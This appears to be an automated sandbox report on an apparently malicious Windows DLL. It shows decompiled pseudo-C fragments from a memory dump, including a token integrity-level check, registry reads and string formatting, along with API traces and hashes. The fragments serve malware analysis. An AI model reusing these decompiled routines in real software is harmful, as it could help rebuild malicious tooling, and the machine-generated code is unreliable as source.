API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: 6f30a5089cd3fd9ae4a9261449b859f01852c1a031cbb90e461f6df66517c15d
Instruction ID: a87a56d461506545bdcb5a98df1ca2ad301dafa7465173484bedee9702a4e92f
Opcode Fuzzy Hash: 6f30a5089cd3fd9ae4a9261449b859f01852c1a031cbb90e461f6df66517c15d
Instruction Fuzzy Hash: 2651F571E03215EFDB61FF68DC44BAEB7F8AB45710F190416E984EB680DB79D9408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0308113D, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0308113D(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x308a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E03086837(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E030850CA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x0308114a
0x03081151
0x03081158
0x0308116c
0x03081177
0x0308118f
0x0308119c
0x0308119f
0x030811a4
0x030811af
0x030811b3
0x030811c2
0x030811c6
0x030811e2
0x030811e2
0x030811e6
0x030811e6
0x030811eb
0x030811ef
0x030811f5
0x030811f6
0x030811fd
0x03081203

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 0308116F
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 0308118F
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0308119F
CloseHandle.KERNEL32(00000000), ref: 030811EF

Part of subcall function 03086837: RtlAllocateHeap.NTDLL(00000000,00000000,03084197), ref: 03086843

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 030811C2
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 030811CA
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 030811DA

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 5a551b4041b89e9dbeb2759b2adb0918a92d8791d7ea567f16dc3c10f620764a
Instruction ID: b897b7be6746ea4336d9ce60cc825968fa6425f3aaa619a4e5fe31e192d36b93
Opcode Fuzzy Hash: 5a551b4041b89e9dbeb2759b2adb0918a92d8791d7ea567f16dc3c10f620764a
Instruction Fuzzy Hash: 41215C75901209FFEF10EF94DC44EEEBBB8EF48304F104066EA41A6291C7758A15EF60

Uniqueness

Uniqueness Score: -1.00%

Function 0308624D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0308624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x308a2d4; // 0x2b2d5a8
				_t1 = _t9 + 0x308b60c; // 0x253d7325
				_t36 = 0;
				_t28 = E0308278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x5bb9631
					_t40 = E03086837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E030849FE(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E030850CA(_t40);
						_t42 = E03087565(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E030850CA(_t36);
							_t36 = _t42;
						}
						_t43 = E030852E5(_t36, _t33);
						if(_t43 != 0) {
							E030850CA(_t36);
							_t36 = _t43;
						}
					}
					E030850CA(_t28);
				}
				return _t36;
			}

0x0308624d
0x03086250
0x03086251
0x03086258
0x0308625f
0x03086266
0x0308626a
0x03086271
0x03086278
0x0308627d
0x03086285
0x0308628f
0x03086293
0x03086297
0x0308629d
0x030862a2
0x030862ac
0x030862b2
0x030862b4
0x030862cb
0x030862cf
0x030862d2
0x030862d7
0x030862d7
0x030862e0
0x030862e4
0x030862e7
0x030862ec
0x030862ec
0x030862e4
0x030862ef
0x030862f4
0x030862fa

APIs

Part of subcall function 0308278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03086266,253D7325,00000000,00000000,?,00000000,030870D9), ref: 030827F3
Part of subcall function 0308278C: sprintf.NTDLL ref: 03082814

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,030870D9,00000000,05BB9630), ref: 03086278
lstrlen.KERNEL32(00000000,?,00000000,030870D9,00000000,05BB9630), ref: 03086280

Part of subcall function 03086837: RtlAllocateHeap.NTDLL(00000000,00000000,03084197), ref: 03086843

strcpy.NTDLL ref: 03086297
lstrcat.KERNEL32(00000000,00000000), ref: 030862A2

Part of subcall function 030849FE: lstrlen.KERNEL32(00000000,00000000,030870D9,00000000,?,030862B1,00000000,030870D9,?,00000000,030870D9,00000000,05BB9630), ref: 03084A0F

Part of subcall function 030850CA: RtlFreeHeap.NTDLL(00000000,00000000,03084239,00000000,00000001,?,00000000,?,?,?,03086B8D,00000000,?,00000001), ref: 030850D6

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,030870D9,?,00000000,030870D9,00000000,05BB9630), ref: 030862BF

Part of subcall function 03087565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,030862CB,00000000,?,00000000,030870D9,00000000,05BB9630), ref: 0308756F
Part of subcall function 03087565: _snprintf.NTDLL ref: 030875CD

Strings

=, xrefs: 030862B9

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 022b8d2398cc2706c9e696d31cbc171b66cbc0d512da3decf690c0b71d86645e
Instruction ID: cfcdd61362735720e71067bef3f393cfab12a05eca2d7aa81351244a26e7059e
Opcode Fuzzy Hash: 022b8d2398cc2706c9e696d31cbc171b66cbc0d512da3decf690c0b71d86645e
Instruction Fuzzy Hash: DB11A33B9037296B8712FBA89C44CBE36AD9F865103094165FA84EB201DF39CC028BE0

Uniqueness

Uniqueness Score: -1.00%

Function 03085C35, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 03085C8C
SysAllocString.OLEAUT32(03081E05), ref: 03085CCF
SysFreeString.OLEAUT32(00000000), ref: 03085CE3
SysFreeString.OLEAUT32(00000000), ref: 03085CF1

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 569e205c595fd292cf2355d62f805fbddcb6859413468b60d4c41f37915953bb
Instruction ID: 664e3931ef1df8c22dd9860bf872deff5661e624337d7f853f100a744d163b0e
Opcode Fuzzy Hash: 569e205c595fd292cf2355d62f805fbddcb6859413468b60d4c41f37915953bb
Instruction Fuzzy Hash: B5312A75901209EFCB15EF98D8C48EEBBF9BF49340B10842EF94A97210D7759649CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03081AB8, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03081AB8(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E03084C8C(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x308a2d4; // 0x2b2d5a8
				_t4 = _t24 + 0x308bd60; // 0x5bb9308
				_t5 = _t24 + 0x308bd08; // 0x4f0053
				_t26 = E03085384( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x308a2d4; // 0x2b2d5a8
						_t11 = _t32 + 0x308bd54; // 0x5bb92fc
						_t48 = _t11;
						_t12 = _t32 + 0x308bd08; // 0x4f0053
						_t52 = E03085D37(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x308a2d4; // 0x2b2d5a8
							_t13 = _t35 + 0x308bd9e; // 0x30314549
							if(E030874B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x308a2b4 - 6;
								if( *0x308a2b4 <= 6) {
									_t42 =  *0x308a2d4; // 0x2b2d5a8
									_t15 = _t42 + 0x308bbaa; // 0x52384549
									E030874B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x308a2d4; // 0x2b2d5a8
							_t17 = _t38 + 0x308bd98; // 0x5bb9340
							_t18 = _t38 + 0x308bd70; // 0x680043
							_t40 = E03081F7A(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x308a290, 0, _t52);
						}
					}
					HeapFree( *0x308a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E03083C84(_t54);
				}
				return _t45;
			}

0x03081ab8
0x03081ac8
0x03081acb
0x03081ad2
0x03081ad4
0x03081ad4
0x03081ad7
0x03081adc
0x03081ae3
0x03081af0
0x03081af5
0x03081af9
0x03081b07
0x03081b15
0x03081b19
0x03081baa
0x03081baa
0x03081b1f
0x03081b1f
0x03081b24
0x03081b24
0x03081b2b
0x03081b37
0x03081b39
0x03081b3b
0x03081b3d
0x03081b44
0x03081b56
0x03081b58
0x03081b5f
0x03081b61
0x03081b68
0x03081b73
0x03081b73
0x03081b5f
0x03081b78
0x03081b7d
0x03081b84
0x03081b94
0x03081ba2
0x03081ba4
0x03081ba4
0x03081b3b
0x03081bb6
0x03081bb6
0x03081bb8
0x03081bbd
0x03081bbf
0x03081bbf
0x03081bca

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05BB9308,00000000,?,74B5F710,00000000,74B5F730), ref: 03081B07
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05BB9340,?,00000000,30314549,00000014,004F0053,05BB92FC), ref: 03081BA4
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,030820B0), ref: 03081BB6

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 189df155ac9b6964fe5a5ea2bfb87613c9c1809c27eb13891a4f9cbe59d7cad6
Instruction ID: cb4f6a3f2d62cddb684822d82d9f2d951943d54e1c16eb8b6c7faaf08406f98d
Opcode Fuzzy Hash: 189df155ac9b6964fe5a5ea2bfb87613c9c1809c27eb13891a4f9cbe59d7cad6
Instruction Fuzzy Hash: AD31F135A02209BFCB20FB98DD84EDE7BFCEF84704F040166B580AB451E3359A06DB50

Uniqueness

Uniqueness Score: -1.00%

Function 03085F9A, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E03085F9A(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x308a2d4; // 0x2b2d5a8
				_t2 = _t22 + 0x308b662; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x308a2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x308a2a4 =  *0x308a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E0308283A(_t49, _t48);
					_t33 = E0308738C(_t48, _t49);
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x308a2a4 < 5) {
							 *0x308a2a4 =  *0x308a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E03081492();
					HeapFree( *0x308a290, 0, _t48);
					goto L9;
				}
				_t50 =  *0x308a390; // 0x5bb8d5d
				if(RtlAllocateHeap( *0x308a290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E030846D1(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x03085f9a
0x03085f9a
0x03085fa1
0x03085fa8
0x03085fac
0x03085fb1
0x03085fbc
0x03085fcc
0x0308600f
0x03086013
0x03086017
0x03086018
0x0308601b
0x03086020
0x03086020
0x03086023
0x03086027
0x03086061
0x03086061
0x03086067
0x0308606e
0x0308606e
0x03086029
0x0308602c
0x0308602e
0x0308603b
0x0308603d
0x03086044
0x0308607b
0x03086080
0x03086082
0x03086084
0x03086084
0x00000000
0x03086082
0x03086046
0x0308604d
0x0308605b
0x00000000
0x0308605b
0x03085fce
0x03085fe9
0x03086003
0x00000000
0x03086003
0x03085ffc
0x00000000

APIs

wsprintfA.USER32 ref: 03085FBC
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03085FE1

Part of subcall function 030846D1: GetTickCount.KERNEL32 ref: 030846E8
Part of subcall function 030846D1: wsprintfA.USER32 ref: 03084735
Part of subcall function 030846D1: wsprintfA.USER32 ref: 03084752
Part of subcall function 030846D1: wsprintfA.USER32 ref: 03084772
Part of subcall function 030846D1: wsprintfA.USER32 ref: 03084790
Part of subcall function 030846D1: wsprintfA.USER32 ref: 030847B3
Part of subcall function 030846D1: wsprintfA.USER32 ref: 030847D4

HeapFree.KERNEL32(00000000,030820FA,?,?,030820FA,?), ref: 0308605B

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: 4b965a2ff5669398b4125adf68d83a6244096f64c4068e554ee7e513d8610be0
Instruction ID: 1e967926025ff90d95236ae100350c5bd605f870b6f363c610bcda9804d81740
Opcode Fuzzy Hash: 4b965a2ff5669398b4125adf68d83a6244096f64c4068e554ee7e513d8610be0
Instruction Fuzzy Hash: D7313A75602209EFCB11EF58D844BDB3BBCBF48350F144062EA859B240D73AA964CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DD472, Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6E1DD47B
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E1DD4E9

Part of subcall function 6E1DD365: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000000,7FFFFFFF,?,00000001,?,00000000,0000FFFF,?,6E1D6714,?,00000000,?), ref: 6E1DD407

Part of subcall function 6E1DF6DA: RtlAllocateHeap.NTDLL(00000000,000000FF,000000FF), ref: 6E1DF70C

_free.LIBCMT ref: 6E1DD4DA

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 014789196985ee0dd74e292f9412f7ec9761d55e3dfa68cc2dd004ccbe0cb7ed
Instruction ID: e84d02987a31de453dac1a742bd3b29471bf386520a774cdb7ab0afa7a5e4576
Opcode Fuzzy Hash: 014789196985ee0dd74e292f9412f7ec9761d55e3dfa68cc2dd004ccbe0cb7ed
Instruction Fuzzy Hash: 1501FCA35056567B672391FB4CC8CBB296DDDD29943214224BE10C7540EF60DC85EDB1

Uniqueness

Uniqueness Score: -1.00%

Function 030871A5, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E030871A5(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x308a2d4; // 0x2b2d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x308ba30; // 0x4f0053
				_v16 = 4;
				_t31 = E03083875(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x308a2d4; // 0x2b2d5a8
					_t5 = _t19 + 0x308ba8c; // 0x6e0049
					_t34 = E03083875(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E030850CA(_t34);
					}
					E030850CA(_t31);
				}
				return _v8;
			}

0x030871ab
0x030871b0
0x030871b5
0x030871bc
0x030871c8
0x030871cc
0x030871ce
0x030871d4
0x030871e0
0x030871e4
0x030871f7
0x030871ff
0x03087213
0x0308721b
0x0308721d
0x0308721d
0x03087224
0x03087224
0x0308722b
0x0308722b
0x03087231
0x03087236
0x0308723c

APIs

Part of subcall function 03083875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,030871C8,004F0053,00000000,?), ref: 0308387E
Part of subcall function 03083875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,030871C8,004F0053,00000000,?), ref: 030838A8
Part of subcall function 03083875: memset.NTDLL ref: 030838BC

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 030871F7
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 03087213
RegCloseKey.ADVAPI32(00000000), ref: 03087224

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 03356199e093757525fdaa65c81fdb8e99729379f8e4f78d698ce43f04b57651
Instruction ID: 3dfc4e5010f5eb1d663ffcee3cec4835ff704a270bac7048eadd560e740f46a6
Opcode Fuzzy Hash: 03356199e093757525fdaa65c81fdb8e99729379f8e4f78d698ce43f04b57651
Instruction Fuzzy Hash: 53113C76601209FBDB11FBD4DC84FEEB7FCAB44700F240165B641A7155EB78DA049B60

Uniqueness

Uniqueness Score: -1.00%

Function 03086872, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E03086872(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E03085C35(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x308a2d4; // 0x2b2d5a8
						_t20 = _t68 + 0x308b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E030837AF(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x03086878
0x0308687b
0x0308688b
0x03086894
0x03086898
0x03086966
0x0308696c
0x0308696c
0x030868b2
0x030868b7
0x030868bb
0x030868c1
0x030868c6
0x030868cd
0x030868dc
0x030868dc
0x030868e0
0x030868e2
0x030868ee
0x030868f9
0x03086904
0x03086908
0x03086912
0x03086916
0x03086918
0x0308691d
0x03086924
0x03086934
0x03086934
0x0308691d
0x03086916
0x03086936
0x0308693b
0x03086940
0x03086940
0x03086946
0x0308694c
0x03086951
0x03086951
0x03086956
0x0308695b
0x0308695b
0x03086956
0x030868e0
0x0308695d
0x03086963
0x00000000

APIs

Part of subcall function 03085C35: SysAllocString.OLEAUT32(80000002), ref: 03085C8C
Part of subcall function 03085C35: SysFreeString.OLEAUT32(00000000), ref: 03085CF1

SysFreeString.OLEAUT32(?), ref: 03086951
SysFreeString.OLEAUT32(03081E05), ref: 0308695B

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: d3d7b98a897e765f5a381509ec46f23059e46b033ee44220986cad23172b6715
Instruction ID: 233196863eee1cdb8967e2ddf144ecb9677a0da6bb6fd681d2c37bf40871a936
Opcode Fuzzy Hash: d3d7b98a897e765f5a381509ec46f23059e46b033ee44220986cad23172b6715
Instruction Fuzzy Hash: B3318936500119EFCB21EF58C988C9BFBB9EBC96407154658F98A9B250E6329D52CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030817B0, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(03084106), ref: 030817CA

Part of subcall function 03086872: SysFreeString.OLEAUT32(?), ref: 03086951

SysFreeString.OLEAUT32(00000000), ref: 0308180A

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: d3a2ba1a3aec288d3d2b982ada4e2e8bbb26ebcfd20520bc15af453ca503099b
Instruction ID: 342c7a9a7b3a987596a65d4960dc5bc8f4be3d0e38f055b14e51e5f5f9f3bc08
Opcode Fuzzy Hash: d3a2ba1a3aec288d3d2b982ada4e2e8bbb26ebcfd20520bc15af453ca503099b
Instruction Fuzzy Hash: B2014F7250210EFFCB51AFA8D8099AF7BB9EF48310B114521F945E6120E774D9169BA1

Uniqueness

Uniqueness Score: -1.00%

Function 03085685, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x308a294) == 0) {
						E03085076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x308a294) == 1) {
						_t10 = E03086B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x0308568c
0x0308568d
0x03085690
0x030856c2
0x030856c4
0x030856c4
0x03085692
0x03085693
0x030856a8
0x030856af
0x030856b1
0x030856b1
0x030856af
0x03085693
0x030856cc

APIs

InterlockedIncrement.KERNEL32(0308A294), ref: 0308569A

Part of subcall function 03086B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 03086B24

InterlockedDecrement.KERNEL32(0308A294), ref: 030856BA

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 322627a7b427ab243da8e04af2a16527d099c9ec78c4800810bc6c08d561a8cb
Instruction ID: 8ff18ebe6ed7e0cc7493c747265583667ba5c34f07f93d248a7bae3ebd991d4b
Opcode Fuzzy Hash: 322627a7b427ab243da8e04af2a16527d099c9ec78c4800810bc6c08d561a8cb
Instruction Fuzzy Hash: 0DE04F39307322DBC772FF689C04BAEAA96AB42B80F098414A4C1D6028D615DC70CAE2

Uniqueness

Uniqueness Score: -1.00%

